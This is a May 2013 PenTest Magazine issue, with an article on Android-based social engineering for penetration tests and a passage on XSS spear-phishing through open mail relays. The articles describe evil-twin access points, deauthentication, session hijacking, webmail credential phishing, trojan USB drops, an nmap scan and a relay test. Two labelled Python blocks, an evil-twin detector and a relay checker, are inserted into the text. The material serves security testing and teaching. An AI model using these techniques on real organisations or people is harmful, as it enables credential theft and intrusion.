PenTest Mag - 2013 May

Published on December 2016 | Categories: Documents | Downloads: 89 | Comments: 0 | Views: 595

PenTest Magazine teaser - 2013 May.

Cyber Security Auditing Software
www.titania.com
Improve your Firewall Auditing
As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand.
The network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail, e.g. web service query tools. However, this is only part of the picture, and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices. Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve.
www.titania.com
Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade. He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titania's products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems.
With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.
You can customize the audit policy for your customer's specific requirements (e.g. password policy), audit the device to that policy and then create the report detailing the issues identified. The reports can include device specific mitigation actions and be customized with your own company's styling. Each report can then be saved in a variety of formats for management of the issues.
Why not see for yourself? Evaluate for free at titania.com

Page 4 http://pentestmag.com OPEN 05/2013
Editor in Chief: Ewa Duranc
Managing Editors: Ewa Duranc, Zbigniew Fiolna
Editorial Advisory Board: Larry Karisny, Amit Chugh, Jeff Weaver, Arnoud Tijssen, Varun Nair, Horace Parks, Jr.
Proofreaders: Ewa Duranc, Patrycja Przybyłowicz, Gavin Inns, Larry Karisny
Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a PenTest magazine.
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic
Art Director: Ireneusz Pogroszewski
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca
Publisher: Hakin9 Media
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.pentestmag.com
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage.
All trade marks presented in the magazine were used only for
informative purposes.
All rights to trade marks presented in the magazine are
reserved by the companies which own them.
DISCLAIMER!
The techniques described in our articles may only
be used in private, local networks. The editors
hold no responsibility for misuse of the presented
techniques or consequent data loss.
Dear PenTest Readers,
We have entered a new month. Therefore, it is high time we summarized May. As usual, in order to provide you with a detailed summary of what we did and what will be done this month, we have prepared PenTest Open – our regular line of PenTest Magazine which is available for free.
We have chosen several articles for this issue, the majority of them have not been published yet, so it's a great chance to take a look at our incoming issues on Smartphone Pentesting, ICS for Pentesters and Starter Kit. Thus, you will learn what your smartphone is capable of!
What is more, in this month's PenTest Open you have a chance to read two articles selected from the newest ebook on Cybersecurity by William F. Slater, III. Equipped with this knowledge, you will be able to protect not only yourself, but also your company and the whole world from cyber attacks. Cybersecurity, cyberwarfare and cyberdeterrence generate a great deal of heated debate nowadays and that is why we wanted to provide you with this valuable source of information.
Enjoy your reading!
Ewa Duranc & PenTest Team
CONTENTS
PENTESTING TRICKS
06 Social Engineering and Phishing Attacks Using Android Device
By Domagoj Vrataric
Picture this: you are involved in penetration testing of a serious client, a bank or telecommunication company. Besides usual testing of the corporate network and Web applications, it is very important to make sure that all employees are introduced to the risk of social engineering and phishing attacks.
14 Using XSS in a Spear-Phishing Attack
By Carlos A. Lozano
When a client asks for social engineering tests, most security consultants try to perform phishing. However, there are a lot of other possibilities to get better results without complexity. By reading this article you will learn how to mix simple techniques with malicious ones to evaluate security controls where people are involved.
20 Wireless Penetration Testing: Beyond the IEEE 802.11 Family of Standards
By Francesco Perna
Wireless penetration testing covers a large family of wireless protocols. Usually penetration testing companies offer their customers only WiFi (IEEE 802.11 family of standards) penetration tests, leaving out the other widespread wireless technologies.
CASE STUDIES
26 Hacking a Bank
By Andrei Bozeanu
A couple of years ago, I was contacted by a major commercial bank in my country to conduct a series of Blackbox penetration tests against their external network, recently after they acquired a very costly Information Security Management System from a major international audit firm.
28 Do No Harm
By Jack Jones
There is no question that penetration testing, done well, can be incredibly valuable in helping executives make well-informed decisions to better manage their company's risk landscape. A pentest, however, can be worse than useless if it results in wasted resources and unnecessary business impact. The difference often hinges on the critical thinking you apply when interpreting test results.
WAR CAMP
32 Applying a Security Compliance Framework to Prepare Your Organization for Cyberwarfare and Cyberattacks
By William F. Slater, III
One of the main disadvantages of the hyper-connected world of the 21st century is the very real danger that countries, organizations, and people who use networked computer resources connected to the Internet face because they are at risk of cyberattacks.
46 Integration of Cyberwarfare and Cyberdeterrence Strategies into the U.S. CONOPS Plan to Maximize Responsible Control and Effectiveness by the U.S. National Command Authorities
By William F. Slater, III
This paper deals with issues related to the present lack of a clearly defined national policy on the use of cyberweapons and cyberdeterrence, as well as the urgent present need to include strategies and tactics for cyberwarfare and cyberdeterrence in the national CONOPS Plan, which is the national strategic war plan for the United States.
LET'S TALK ABOUT SECURITY
59 SECUCON 2013 Conference Summary
By PenTest Team
SECUCON 2013 is a conference hosted by SECUGENIUS, a unit of HARKSH Technologies Pvt Ltd, at GGNIMT, Ludhiana, with a vision to create awareness of the need for security in social living and to spread a message of generating opportunities in the same field. The article covers a short summary of the event.
60 Smartphone: a win-win product for both consumers and sellers
By Rajiv Ranjan
Nowadays, smartphones are a basic part of life for every corporate employee. They use smartphone devices to gain access to the company's credentials and to check company specific mails and data. Thus security remains a big concern at the workplace. So penetration testing needs to be done at every available aspect whenever it is possible.
INTERVIEW
64 Interview with Ian Whiting, CEO of Titania Company
By PenTest Team
PRODUCT REVIEW
68 Titania's Paws Studio Review
By Jim Halfpenny
PENTESTING TRICKS
Social Engineering and Phishing Attacks Using Android Device
Picture this: you're involved in penetration testing of a serious client, a bank or telecommunication company. Besides usual testing of the corporate network and Web applications, it's very important to make sure that all employees are introduced to the risk of social engineering and phishing attacks. In this article I will show how it is possible to make such attacks with an Android device and a few applications.
In my opinion, every professional penetration test should have social engineering and phishing attacks implemented as an obligatory part of the penetration testing solution offered to your clients. That is what makes the difference between good and better service. Imagine that you are given the assignment by the CSO of Company X to test their employees against the social component of malicious attacks. And now what? The human weakness factor is easier to exploit than network security. You can have the safest firewalls and VPNs, but in the end, if you have security-senseless employees, you have a potential problem. The idea is to make a security assessment using an Android device and applications; to be less suspicious it's a good idea to use a tablet or smartphone, not a laptop. The article describes the tools, techniques, strategy, preparation and the realization of such attacks. The complete Scenario section of the article is fictional and does not reflect a real situation in the wild. The idea is to bring closer the thinking of performing penetration testing with mobile devices, in this case an Android tablet. It is very hard to perform an attack like the one described in this article, but on the other side, it is not impossible, and in general, there is a real threat to companies from attacks using social engineering and weaknesses in human psychology. And remember, the focus of this article is to show penetration testers in which ways they could conduct penetration testing, and not to make a universal way to test any corporation, bigger or smaller.
Platform and Tools
In my previous article I wrote about a modified Android OS and a few Android applications for penetration testing, including dSploit, a penetration testing application with plenty of options for Man in The Middle (MITM) attacks. This Android penetration suite can help you while you're performing social engineering tricks. dSploit (see Figure 1) has an option to disconnect clients from the wireless network, thus buying time for further improvisation. It also has the ability to redirect clients to a specific website, so you'll have additional help for a phishing attack. The core of this application is features from nmap, iptables, tcpdump, ettercap and hydra. With Android PCAP Capture, which is essentially Kismet for Android, you're able to get more detailed information, such as the list of clients connected to an accessible network, their MAC addresses, and other useful information. The thing is, the application doesn't work without an external wireless card; on their official Web site there is a list of supported Android devices and USB cards which work without problems. For using this application out-of-the-box, you'll need an OTG USB adapter or cable, a wireless USB card with the RTL8187 chipset, Android 4.0 or higher and support for USB host mode on your Android device. For phishing attacks, kWS – Android Web Server can help you with serving cloned Web sites. Wireless Mac Changer is used to change the MAC address of your wireless adapter, so we could pretend to be a wireless access point from a specific vendor, and thus sniff network traffic. Besides that, there are standard Man in The Middle applications such as DroidSheep (see Figure 2), Droidsniff and Droidsteal, which are essentially the same application with features for capturing accounts (Facebook, Gmail, Twitter and similar Web services) when you're connected to a wireless network. If you have special needs for applications such as Social engineering toolkit (SET), Metasploit or Aircrack-ng, you can install Kali Linux on your device with Complete Linux Installer (see Figure 3). For easier control of the distribution, you can enable and configure a VNC or SSH server on the local device. By installing Kali you're getting a full-feature penetration testing distribution on your mobile device. Installation is very simple and it's done in a few steps: first you need to download the archive with the image from the official Web site of Complete Linux Installer. After downloading, extract the archive to the /sdcard/kali directory, add the widget to the tablet workspace and choose the image file to load. A great feature of Kali is multi-platform support, which also includes the ARM architecture, usually running on Android devices (see Figure 4). The device used in this example is a Nexus 7 GSM with 32 GB of storage, and to use Kali Linux, you will need at least 4 GB of free space on the device.
Figure 1. dSploit – MiTM options in suite
Figure 2. DroidSheep – hijacking features
Strategy
At the very beginning, you need to develop a strategy for the attack. If you're performing “white box” penetration testing, you'll probably have access to the internal network. If you're lucky, the organization has a wireless network, and if you want to gain unauthorized access to it, try social engineering. Know your target and inform yourself about it: the more information you possess, the bigger the chance to succeed; information gathering and target research are crucial steps while performing social engineering. You could introduce yourself as someone who is highly ranked in the target company; that fact will give you some credibility. To gain trust you can say that you've come for a meeting with the IT manager, or simply that you're someone from another division of the same organization who is in a hurry or needs help to connect to the wireless network. If you are trying to get passwords from employees, play the “empathy card” and you'll have more chances to succeed; in human psychology there is a deep-seated need to help others in trouble. If a company has vendor specific equipment you could introduce yourself as a vendor technician, and to look convincing get a t-shirt with the vendor logo and name.
If you can't get access to the wireless network as described above, try to make a rogue wireless access point, in other words, your own wireless network from where you can start sniffing network traffic, including hijacking sessions and using them with the built-in browser. The attack with a rogue access point is quite an interesting way to obtain the information you need. If the victim uses a wireless network and is located far from the access point, you can get close to the victim with your rogue access point (Android device). Your wireless beacon will have a stronger signal than the actual access point, and the victim's wireless card will probably connect to your device. It's a good idea to change the MAC address of your wireless card on the tablet or smartphone to the address of the nearest access point with the best signal so it looks more convincing: same SSID, same MAC address. There is one important detail with raising a rogue access point. If the company has a wireless network, it is probably encrypted, but remember that when raising a rogue access point, don't set up any encryption, so the victim's laptop will automatically connect to the rogue access point. Every big IT organization has its own information system which probably has some kind of internal Web application with a login page, perhaps a CMS or webmail application. There are several ways to make a phishing Web site; one of them is to use Scrapbook, a Firefox add-on which has many options for saving Web pages (see Figure 5). Unfortunately, this plugin doesn't work on Firefox for Android on my device (Nexus 7) so I cloned the website on a desktop machine, and later transferred it to the Android device. Now, when we have the cloned Web page ready for phishing, we have to figure out a way to lure employees into our trap. One more thing you could do is install a trojan horse or password stealer on a USB stick and leave the stick somewhere on the floor, so it looks like someone dropped it. A curious employee will pick up the stick and connect it to his PC or laptop to see the content on it. Choose a place where you can be sure that someone will see it, not under a desk, rather a place where people gather during a break or a place where people naturally put things down, such as the space around the coffee machine.
Figure 3. Complete Linux Installer – loading image
Figure 4. Running Kali on Android
Figure 5. Scrapbook – options overview
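The rogue access point described in this section (corporate SSID copied, MAC address copied from the nearest real AP, no encryption, clients pushed off the real network with the deauthentication features of dSploit or aircrack-ng) leaves exactly the traces a wireless monitor should flag. The detector below is an added example, not code from the article or from any tool it names; the corporate AP inventory, the beacon records and the deauth frames are constructed sample data in the shape a monitor-mode sensor would report.

```python
"""Evil-twin and deauthentication-flood detector for Wi-Fi monitoring data.

Added example, not from the article or its tools. Inputs are constructed:
a small inventory of corporate access points and records as a monitor-mode
sensor would report them (beacons seen, deauth frames seen)."""
from collections import defaultdict

# Constructed inventory: BSSID -> (SSID, security). Real deployments pull this
# from the wireless controller; the OUI 00:1a:2b is just a sample vendor prefix.
CORPORATE_APS = {
    "00:1a:2b:10:20:30": ("CompanyX-Corp", "WPA2"),
    "00:1a:2b:10:20:31": ("CompanyX-Corp", "WPA2"),
}

# Constructed beacon observations: the first is the real AP, the second is a
# rogue that copied its SSID and BSSID but runs open, the third is a rogue with
# its own BSSID, the last is an unrelated network.
SAMPLE_BEACONS = [
    {"bssid": "00:1a:2b:10:20:30", "ssid": "CompanyX-Corp", "security": "WPA2", "rssi": -62},
    {"bssid": "00:1a:2b:10:20:30", "ssid": "CompanyX-Corp", "security": "OPEN", "rssi": -35},
    {"bssid": "02:1a:2b:aa:bb:cc", "ssid": "CompanyX-Corp", "security": "OPEN", "rssi": -40},
    {"bssid": "c4:12:f5:00:00:01", "ssid": "CoffeeShop", "security": "OPEN", "rssi": -70},
]

# Constructed deauth frames as (timestamp_seconds, source_address): fifty
# frames in five seconds carrying a corporate BSSID, plus three genuine ones.
SAMPLE_DEAUTH = [(100.0 + i * 0.1, "00:1a:2b:10:20:30") for i in range(50)] + [
    (40.0, "00:1a:2b:10:20:31"), (70.0, "00:1a:2b:10:20:31"), (130.0, "00:1a:2b:10:20:31"),
]


def analyse_beacons(beacons, inventory=CORPORATE_APS):
    """Return (kind, bssid, detail) findings for beacons that misuse a corporate SSID."""
    corp_ssids = {ssid for ssid, _ in inventory.values()}
    findings = []
    for b in beacons:
        ssid, bssid, sec = b["ssid"], b["bssid"].lower(), b["security"].upper()
        if ssid not in corp_ssids:
            continue  # other people's networks are out of scope
        if bssid in inventory:
            exp_ssid, exp_sec = inventory[bssid]
            if sec != exp_sec or ssid != exp_ssid:
                # Same BSSID as a known AP but different security: a cloned MAC.
                findings.append(("bssid-spoof", bssid,
                                 f"seen as {ssid}/{sec}, inventory says {exp_ssid}/{exp_sec}"))
        else:
            findings.append(("unknown-bssid", bssid, f"advertises corporate SSID {ssid}"))
        if sec == "OPEN":
            # The rogue AP in the article deliberately runs without encryption.
            findings.append(("open-twin", bssid,
                             f"open network using SSID {ssid} at {b['rssi']} dBm"))
    return findings


def analyse_deauth(frames, window_s=10.0, threshold=20):
    """Return {source: peak_count} for sources exceeding threshold deauths in any window.

    The source address is spoofable, so a hit means 'a flood carrying this
    address', not 'this AP is hostile'."""
    by_src = defaultdict(list)
    for ts, src in frames:
        by_src[src.lower()].append(ts)
    flagged = {}
    for src, times in by_src.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):  # sliding window over sorted timestamps
            while t - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[src] = peak
    return flagged


if __name__ == "__main__":
    for finding in analyse_beacons(SAMPLE_BEACONS):
        print("beacon:", *finding)
    for src, n in analyse_deauth(SAMPLE_DEAUTH).items():
        print(f"deauth flood: {n} frames from {src} within 10 s")
```

Legitimate enterprise networks advertise one SSID from many BSSIDs, which is why the check is driven by an inventory rather than by SSID duplication alone.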
Preparation
Before you start with social engineering, it is a wise decision to inform yourself about the target company before entering the company area. That is the most important thing in every type of penetration testing. Try to gather as much information as you can about employees: do they use some special phrases in their everyday communication, when is the lunch break (small hint: an empty workspace at lunch time is the ideal time to explore the area in search of valuable information). Small things count as most important in social engineering; they could make or break a penetration test. Inform yourself which operating system the employees use, and thus you will have a smaller testing scope in later testing. A great tool for information gathering about a specific person is recon-ng (see Figure 6); it is similar to Metasploit and SET (Social Engineering Toolkit), but intended for information gathering, with many modules specially dedicated to finding information about employees, from auxiliary and contacts to pwnedlist – a module used to “determine if email addresses are associated with leaked credentials”. You can stalk people via the Twitter module to get to know them better and find out what things they like, to be able to more easily develop communication and extract the information we want from them. LinkedIn and Jigsaw are also supported by this tool. Another thing you could do is to create stickers with QR codes on them that lead to a malicious URL; SET has an option to generate a QR code and assist with that type of attack. For this type of attack you'll need to be patient for a while, a few days, just to be sure that a sufficient number of employees noticed the QR code and, depending on their curiosity and knowledge about QR codes, did or didn't scan it. A good example would be to create a simple script that will record which employees scanned the QR code that redirected them to the script. Remember, you are trying to test employees, not to harm them in any way, and that includes installing malicious applications on their devices. Make good preparation for the attack before you start it.
Figure 6. Recon-ng – list of basic commands
Figure 7. kWS Web server
Launching The Attack
So, now when you have both tools and strategy, you can start off another side of penetration testing, social engineering. Enter the organization area with self-confidence, so that no one would ever suspect that you came to test them; don't be too suspicious in your behavior. There is always someone at the entrance to the working area in an organization. Introduce yourself as a new network technician who received a call about a problem with the wireless network and ask for permission to test the current wireless network. That is “pretexting”, the act of creating an invented scenario to persuade a targeted victim to release information or perform some action. Raise a rogue access point on the Android device and persuade someone to help you while you're testing network issues by connecting to it and surfing, so you can check if the corporate network and Internet are both working. In the background, run dSploit and start sniffing traffic and hijacking sessions. Later, you could analyze the .pcap file with Shark Reader or with Wireshark on a laptop or PC. Leave dSploit sniffing in the background and run DroidSheep to capture sessions for Webmail, CMS or something similar which could be useful to a malicious attacker. DroidSheep has a couple of helpful options to help you capture user sessions, such as the option to save cookies or export them via email and add a host to the blacklist. Tell the employee you were told that most Web services such as Webmail don't work, so both of you need to check them while you're capturing all network traffic with sessions. The next thing you could do is to clone the targeted Web site to your Android device, run the Web server and lure the employee to visit the phishing site after you “fixed” the problem with the wireless network. Set up the /etc/hosts file on the Android device; for example, one line should look like this: 127.0.0.1 webmail.companyx.com. So, when the victim opens a specific URL such as the above URL for corporate Webmail, while they are connected to the software access point on your device, you will redirect them to your cloned version of Webmail. The trick with the phishing attack is that after the victim tries to log in to Webmail, a script will save the credentials into a text file, throw an error about a wrong password, and redirect the victim to the real corporate Webmail. With a little luck, the penetration tester should easily obtain the password (see Figure 7).
Figure 8. Wireless MAC changer – simple interface
Figure 9. SET – generating malicious QR code
Figure 10. SET running inside Kali on Android
Figure 11. Running SSHDroid
Scenario
Company X is a corporation with more than 300 employees, which gives Peter a big chance to succeed in the attack. Peter is a penetration tester who works in a security company, and was commissioned to test Company X's employees on social engineering attacks. With recon-ng he managed to find out who the key people in the company are, in case he needed to cover up; he will know which person to mention to gain trust. He also discovered which sectors the company has, and made a sorted list, by sector, of the people he had previously put together. That gave him a good background. Before the attack, he scanned wireless networks around the company building, and what he saw is that the corporate wireless access points had the first three octets of the MAC address of vendor specific network equipment. So armed with this information, he decided to change the MAC address and SSID of his wireless network card on the tablet. With Wireless Mac Changer (see Figure 8) that was a piece of cake. At the entrance he met a doorman who checks documents; employees had ID cards hanging from their necks, so they could enter without the doorman checking them. He introduced himself as network support, wearing a vendor t-shirt, which he got on eBay, and noted that he had received a call from the company's CTO to fix or replace a broken network device which enables the Internet link. The doorman let Peter inside the office area, knowing that it's necessary for them to have the Internet working. Peter dropped a few different USB sticks around the office, one in the toilet, one next to the coffee machine, and two on random office desks. While he was on his way to the coffee machine, he pasted a QR code on the wall next to the machine, previously generated with Social engineering toolkit (SET) (see Figures 9, 10), so while waiting for coffee, people will surely notice that QR code, and if he's lucky, scan it. Peter left his tablet on one office desk and turned on the software wireless access point, connected it to the charger so he would solve two things with this move: the battery will not drain and it will be less suspicious if somebody sees the tablet connected to a charger, because it's logical that employees charge their devices when they are empty. To lure people into connecting to his tablet he told a few employees that he had made a backup solution for the wireless, as the network technician, while he launched a deauthentication attack with aircrack-ng to prove to them that the corporate wireless network is not working as it should. After that, clients started disconnecting from the corporate wireless and connecting to his “backup wireless” SSID; he ran DroidSheep, a tool for man in the middle attacks, set up the fake phishing corporate Webmail for those who connect to his access point, and also a traffic sniffer for Android – Shark. He turned on kWS – Android Web Server and started hosting phishing sites. Now, he will have a spying device inside the company, without suspicious looks from the employees. He installed the SSH server on his device so he could easily have access to Kali Linux from the outside world, and run various attacks (see Figure 11). After a few days, Peter managed to collect dozens of accounts through the phishing Web sites he cloned from the original ones and through the Man in The Middle attack with DroidSheep. Also, a few employees became victims of the malicious QR codes and the trojan horse dropper from the USB sticks which infected their devices. After this demonstration of social engineering, managers from Company X realized that education of employees on social engineering attacks is an essential part of education on IT security.
Summary
In this article I have tried to inspire and encourage readers to engage their imagination while they are planning their next penetration test. Today, we're living in an era when managers invest in hardware and software protection, from firewalls to IPS/IDS, but the weakest link in an organization is still security-uneducated employees. It isn't hard to exploit employees who don't know much about such attacks and protection from them. You don't need to have much experience with social engineering to conduct the above described attacks with mobile devices; for example, tablets are widely used in organizations, so when you see somebody using a tablet or smartphone, it's common and everyday stuff. The thing is that nobody will suspect you're holding a hacking device in your hands. The devices for the above described attacks are a Nexus 7 tablet and a Nexus S mobile phone. The Nexus 7 isn't expensive and it has sufficient resolution for comfortable work, 1280×800 WXGA pixels, a quad-core ARM Cortex-A9 CPU, and the Nexus S could be a good backup device if something doesn't work as planned.
Wireless Mac Changer on Google Play
Complete Linux Installer on Google Play
Android PCAP Capture – Google Play
kWS – Android Web Server on Google Play
Shark for Root on Google Play
SSHDroid on Google Play
DroidSheep: http://forum.xda-developers.com/showthread.php?t=1593990
dSploit: http://cloud.github.com/downloads/evilsocket/dsploit/dSploit-1.0.31b.apk
On the Web
http://ctrlaltnarwhal.wordpress.com/2012/10/29/173/ – “Phishing Using Only a Android Phone”
https://www.os3.nl/_media/2009-2010/students/laurens_bruinsma/ssnproject_android_v1.0.pdf – “Compromising WiFi Security with Android”
http://www.kismetwireless.net/android-pcap/ – “Kismet (for Android)” documentation
http://www.social-engineer.org/framework/Pretexting_Defined – “Pretexting Defined”
https://afreak.ca/blog/social-engineering-using-qr-codes/ – “Social engineering using QR codes”
http://www.csoonline.com/article/479038/social-engineering-anatomy-of-a-hack – “Social Engineering: Anatomy of a Hack”
http://hackaday.com/2011/10/04/wifi-jamming-via-deauthentication-packets/ – “WiFi jamming via deauthentication packets”
Glossary
Android
Social engineering
Phishing
QR codes
dSploit
Kali
Pentest
Recon-ng
Complete Linux Installer
Social engineering toolkit (SET)
DroidSheep
DOMAGOJ VRATARIC
Domagoj Vrataric is IT Security Manager at Aduro Ideja Ltd., a company from Croatia which offers software solutions for the telecom industry, high volume data processing, real-time systems, penetration testing services and mobile application security. He has experience with penetration testing (OWASP methodology), mostly in the telecommunication industry, eCommerce (osCommerce, ZenCart, OpenCart) and the media industry: 10 years' experience with Linux, 8 with IT security, knowledge about hacker culture and way of thinking. He is currently involved in penetration testing and is project manager on several security projects. Additionally he is in charge of security in Aduro Ideja, from monitoring IT infrastructure, administration of Debian servers and security policies on computers and mobile phones, to Android reverse engineering.
Cyber attacks are on the rise.
So, you think your systems and networks are secure?
Think again – you've already been attacked and compromised.
And, we should know because we did it in less than four hours. Here's the good news: we're the good guys. We can tell you what we did and how we did it, so you'll be prepared when the bad guys try it – and they will. We'll show you how.
Visit www.KnowledgeCG.com to learn how KCG's experienced, certified cybersecurity professionals help our government and commercial customers protect their cybersecurity programs by knowing the threat from the inside out.
Combat cyber attacks. Ensure resilience. Mitigate risk. Improve operational efficiency.
Trusted Cyber Advisor
PENTESTING TRICKS
14 http://pentestmag.com Page OPEN 05/2013
Using XSS in a
Spear-Phishing Attack
When a client asks for a social engineering tests, most part of
security consultants try to perform a phishing. However, there is a
lot of other possibilities to get better results without complexity.
N
owadays, it is very common for the compa-
nies to use security services that include
social engineering and physical security
evaluations. Sometimes, as a part of an integral
analysis or only as unitary tests to accomplish with
corporate or government requirements.
The concept of social engineering, however, is very broad. Formally, it refers to the practice of obtaining confidential information by manipulating legitimate users. When we think about social engineering, the first thing that comes to mind is Kevin Mitnick's stories, where he compromises information systems by leveraging human weaknesses.
From this we can conclude that the real purpose of a social engineering evaluation is to analyze how consistently corporate processes are followed: for example, a process for requesting financial information in which no employee is allowed to release sensitive data without a series of identity validation controls.
I mentioned physical security evaluations at the beginning because I believe physical security and social engineering are tightly related: with the sensitive information obtained through social engineering, a malicious user can defeat physical security controls.
The number and complexity of a company's processes, which grow with the size of the company, offer endless possibilities for analyzing the reliability of the security controls in place. The aim of this article is to demonstrate some of the attacks I have conducted on companies as part of security evaluations, showing the vulnerabilities that made them successful, along with their possible implications and corrections. The corrections must be analyzed by each company, since the controls to implement will differ with company size, business focus, resources, internal politics, and so on.
Conducting a Phishing Attack
I have found that XSS is common, especially because most penetration testers only show in their reports a pop-up from a JavaScript payload like this one: <script>alert("Hello world!")</script>. Although this is evidence of the vulnerability, a truly malicious user will not limit his attack to the pop-up; he will exploit this simple vulnerability to gain more.
What follows is the most common, easiest and still very effective scenario for exploiting an XSS. The test combines different vulnerabilities with the information gathered during the reconnaissance phase so that the XSS is exploited with maximum effect.
First we need to deliver the XSS to the application's users. There are many ways, but the most common is e-mail. We could send an e-mail in the corporate format from a public address (Gmail, Outlook, etc.), but that reduces the effectiveness to zero. There are also anonymous e-mail senders, but most of these public services are blacklisted by mail servers, so our e-mails would be flagged by the company.
The most effective way to send the e-mails is to use open relays on the company's own mail servers. It is very common for companies to have many mail servers on UNIX platforms that were never properly configured and simply run with bad or default settings.
First of all you need to find the mail servers. You can use the following Nmap command (-Pn skips host discovery and scans every address; -P0 is the older spelling of the same option):
nmap -vv -sV -Pn -p 25 [range of IP]
Next you need to check whether each mail server is an open relay, that is, whether it can be used to deliver our XSS payload. You can test each server by hand with Telnet. The decisive step is RCPT TO: if the server answers 250 to a recipient at a domain it does not host, from a sender it has not authenticated, it will relay for anyone; a properly configured server answers 550 or 554 (for example "Relay access denied"). The dialogue looks like this (server replies omitted):
telnet [mail server] 25
HELO domain.com
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
DATA
Subject: Test

Hello world!
.
QUIT
If we are comfortable scripting, we can write a script that performs this verification automatically against every mail server Nmap found.
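The script this paragraph alludes to, as an added example that is not part of the original article: it automates the Telnet dialogue above with Python's smtplib, treats a 250 answer to RCPT TO for a foreign domain as evidence of an open relay, and stops before DATA so nothing is actually relayed through the victim's server. The fake SMTP server it is exercised against, the example.* host names and addresses, and the HELO name are all constructed for this example.

```python
"""Open-relay check for the mail servers Nmap found on port 25 (added example)."""
import smtplib
import socketserver
import threading


def check_open_relay(host, port, mail_from, rcpt_to, helo_name="scanner.example", timeout=10):
    """Return (is_open_relay, reply_text).

    A server counts as an open relay when it answers 250/251 to a RCPT TO for a
    domain it does not host, from an unauthenticated sender. We send RSET and QUIT
    instead of DATA, so the check leaves no message in the target's queue.
    """
    try:
        with smtplib.SMTP(host, port, local_hostname=helo_name, timeout=timeout) as smtp:
            code, msg = smtp.helo(helo_name)
            if code != 250:
                return False, f"HELO rejected: {code} {msg.decode(errors='replace')}"
            code, msg = smtp.mail(mail_from)
            if code != 250:
                return False, f"MAIL FROM rejected: {code} {msg.decode(errors='replace')}"
            code, msg = smtp.rcpt(rcpt_to)
            smtp.rset()  # abandon the transaction; the context manager sends QUIT
            return code in (250, 251), f"RCPT TO: {code} {msg.decode(errors='replace')}"
    except (OSError, smtplib.SMTPException) as exc:
        return False, f"connection failed: {exc!r}"


# --- constructed fake SMTP server, so the check can be run offline -----------

class FakeSMTPHandler(socketserver.StreamRequestHandler):
    """Minimal SMTP responder: relays for anybody when misconfigured, otherwise
    only accepts recipients in its own domains (Postfix-style 554 reply)."""

    def reply(self, text):
        self.wfile.write(text.encode() + b"\r\n")

    def handle(self):
        self.reply("220 mail.client.example ESMTP")
        while True:
            line = self.rfile.readline()
            if not line:
                break
            verb, _, arg = line.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb in ("HELO", "EHLO"):
                self.reply("250 mail.client.example")
            elif verb == "MAIL":
                self.reply("250 2.1.0 Ok")
            elif verb == "RCPT":
                rcpt = arg.partition(":")[2].strip("<> ")      # "TO:<user@dom>" -> user@dom
                domain = rcpt.rpartition("@")[2].lower()
                if self.server.relay_allowed or domain in self.server.local_domains:
                    self.reply("250 2.1.5 Ok")
                else:
                    self.reply("554 5.7.1 Relay access denied")
            elif verb == "QUIT":
                self.reply("221 2.0.0 Bye")
                break
            else:  # RSET, NOOP, ...
                self.reply("250 2.0.0 Ok")


class FakeSMTPServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, relay_allowed, local_domains=("client.example",)):
        super().__init__(("127.0.0.1", 0), FakeSMTPHandler)  # port 0: any free port
        self.relay_allowed = relay_allowed
        self.local_domains = set(local_domains)


def run_against_fake(relay_allowed):
    """Start a fake server with the given policy, run the check, tear it down."""
    server = FakeSMTPServer(relay_allowed)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        host, port = server.server_address
        return check_open_relay(host, port, "attacker@evil.example", "victim@outside.example")
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    # Real use: take the hosts with 25/tcp open from the Nmap output and call
    # check_open_relay(host, 25, ...) for each one.
    for name, misconfigured in (("open relay", True), ("hardened", False)):
        print(name, run_against_fake(misconfigured))
```

Only the reply to RCPT TO is inspected because that is where relaying policy is enforced; a server that rejects MAIL FROM outright is also reported as "not open", with the reply text kept so you can see why.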
Once we have verified that a mail server lets us send anonymous e-mail, we can use it to send our XSS attack, in the corporate image, to a small number of users.
Why a small number and not all the employees? Because the more e-mails we send, the more likely it is that someone calls the security office to validate the message. Sending to specific targets is more effective and generates less noise inside the company.
While it is widely known that managers and directors are the most vulnerable targets because of their poor IT knowledge, my recommendation is to avoid them on the first attempt and to target them only if it is the only way to perform the attack. This group usually has more influence over the internal security processes, and a warning from them has a faster impact than a warning from anyone else. Once a warning is acted on by the IT or security department every later e-mail will be scrutinized, so in this kind of attack speed is very important.
